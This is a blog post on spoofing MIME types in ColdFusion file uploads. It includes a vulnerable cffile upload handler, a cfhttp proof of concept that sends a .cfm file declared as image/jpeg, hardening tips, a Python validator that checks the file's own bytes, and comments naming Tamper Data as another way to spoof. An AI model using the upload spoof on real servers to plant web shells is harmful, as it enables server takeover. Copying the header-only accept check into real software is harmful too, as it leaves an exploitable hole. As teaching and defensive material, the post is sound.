Spoofing MIME Types with ColdFusion and CFHTTP

Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can easily spoof the MIME type of any file and get it uploaded to another server, allowing any number of code exploits.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice that this form posts to an action page called uploadact.cfm, which only accepts JPEGs and GIFs. That action page handles the upload as follows:

<cfif isDefined('fileUpload')>
<!--- accept compares only the MIME type the client declared for the uploaded part, not the file's contents --->
<cffile
action='upload'
fileField='fileUpload'
destination='C:\path to upload'
accept='image/jpeg,image/gif'
nameconflict='makeunique'>
<p>Thank you, your file has been uploaded.</p>
<p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part: we’re going to write a page using cfhttp that runs on the attacker’s own server or workstation and uploads a file local to them, faking its MIME type with cfhttpparam:

<cfhttp
url='http://example.com/uploadact.cfm'
method='post'>
<cfhttpparam
type='formfield'
value='Upload File'
name='submit'>
<!--- mimetype is whatever the sender chooses; the receiving cffile accept check sees only this value --->
<cfhttpparam
type='file'
name='FileUpload'
file='C:\PathTo\test.cfm'
mimetype='image/jpeg'>
</cfhttp>

With this we could upload an ASP or ColdFusion based web shell that would essentially give us unlimited access to the server.  So follow these tips:

  1. If you have an Enterprise license, use Sandbox Security.  This limits each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry.  If you can use Sandboxes, do this for each Sandbox, or set up a global Sandbox on your main site’s directory.  Remember that with Sandboxes, if you absolutely need cfexecute, you can set up a Sandbox for a single folder with access to it and put the processing files there (say, to use FFMPEG for video conversion).
  3. Disable JSP (Adobe Instructions) if you don’t actually use it.  Since ColdFusion runs as System on Windows by default, any JSP file that makes its way onto the server will have full access, and JSPs don’t follow Sandboxes, so even if Sandboxes are set up they are of no use against JSP.
  4. Run ColdFusion as another user (Adobe Instructions).  Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded.
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this).
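As an added example (not code from the original post, and written in Python rather than CFML because the lesson is the same in any language), here is what tip 5’s “multiple checks” look like on the server side: the bytes are inspected instead of the client-declared type, and the stored extension is tied to the detected type. The sample uploads are constructed inline.

```python
# Constructed-sample validator for an image-only upload endpoint (added example).
# All three inputs (declared type, filename, bytes) are client-controlled; only
# the bytes are inspected and nothing is taken on trust.

# Leading bytes of the two formats the page's accept list allows.
SIGNATURES = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Extension allowlist tied to the detected type, so content that sniffs as an
# image cannot be stored under a name the server would execute (.cfm, .jsp).
ALLOWED_EXTENSIONS = {"image/jpeg": {"jpg", "jpeg"}, "image/gif": {"gif"}}

def sniff_type(data: bytes):
    """Return the MIME type implied by the file's own bytes, or None."""
    for mime, sigs in SIGNATURES.items():
        if any(data.startswith(sig) for sig in sigs):
            return mime
    return None

def validate_upload(declared_mime: str, filename: str, data: bytes):
    """Return (accepted, detail). The declared type is compared, never trusted."""
    actual = sniff_type(data)
    if actual is None:
        return False, "content matches no allowed image signature"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS[actual]:
        return False, f"extension '.{ext}' not allowed for detected {actual}"
    if declared_mime != actual:
        return False, f"declared {declared_mime} but content is {actual}"
    return True, actual

# Constructed sample uploads, mirroring the post's cfhttpparam that wraps a
# .cfm file in mimetype='image/jpeg'.
SAMPLES = {
    "genuine_gif": ("image/gif", "photo.gif", b"GIF89a" + bytes(20)),
    "spoofed_mime": ("image/jpeg", "test.cfm", b"<cfset x = 1>"),
    # A real GIF header in front of script text passes the signature check on
    # its own; the extension allowlist (and storing uploads outside the
    # webroot) is what catches it, hence tip 5's "multiple checks".
    "polyglot": ("image/gif", "test.cfm", b"GIF89a<cfset x = 1>"),
}

def check_samples():
    """Run every constructed sample through the validator."""
    return {name: validate_upload(*parts) for name, parts in SAMPLES.items()}

if __name__ == "__main__":
    for name, (ok, detail) in check_samples().items():
        print(f"{name:13} {'ACCEPT' if ok else 'REJECT'}: {detail}")
```

ColdFusion 10 added a strict attribute (default true) to cffile action='upload' that inspects the file content against the accept list in much the same way, which is why the spoof above stops working there.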

3 thoughts on “Spoofing MIME Types with ColdFusion and CFHTTP”

  1. Thanks for posting this!

    I just wanted to give you a heads up, that there’s actually an easier way to do this.

    If you start up a Firefox addon called tamper data, it will allow you to intercept http requests before they get sent to the server. If you go to an upload form of any kind, upload a doc with the wrong mime type, then edit the mime type to an accepted type using tamperdata before it gets sent to the server you.

    Enjoy! 🙂

  2. I have tried with your code to upload a cfm file using cfhttp. But it is throwing an error as I have added accept="image/jpeg" to cffile.
    I am using Coldfusion 10 and I have directly used your code; still it's not working.
    Can you please recheck.

    1. This code was written a few years ago, I believe on at least Coldfusion 8, and I’m not surprised this doesn’t work anymore on Coldfusion 10.
